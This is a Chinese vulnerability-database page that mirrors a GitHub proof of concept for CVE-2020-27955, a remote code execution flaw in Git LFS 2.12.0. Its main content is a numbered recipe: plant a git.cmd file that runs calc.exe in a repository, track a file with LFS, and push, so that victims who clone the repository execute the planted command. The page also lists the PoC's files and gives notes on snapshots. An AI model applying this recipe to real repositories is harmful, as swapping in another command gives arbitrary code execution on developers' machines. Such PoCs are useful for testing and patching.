漏洞平台

POC详情： e739b0247aebea1acca7a4b34f4064446c6bcbc7

来源

https://github.com/TheTh1nk3r/cve-2020-27955

关联漏洞

标题： Git Lfs代码问题漏洞 (CVE-2020-27955)
描述：Git Lfs是Git Lfs团队的一个用于git项目中处理大文件的命令行工具。 Git LFS 2.12.0版本存在代码问题漏洞，该漏洞可造成远程代码执行的危害。

描述

cve-2020-27955

介绍

# cve-2020-27955
cve-2020-27955

#### 复现
1. 创建github仓库
2. git clone https://github.com/attacker/poc.git .
3. echo calc.exe > git.cmd
4. git lfs track “*.dat”
5. echo “Junk” > large.dat
6. git add -A
7. git commit -m “POC”
8. git push -u origin master -f

文件快照


 [4.0K]  /data/pocs/e739b0247aebea1acca7a4b34f4064446c6bcbc7
├── [   9]  git.cmd
├── [   5]  large.dat
└── [ 278]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。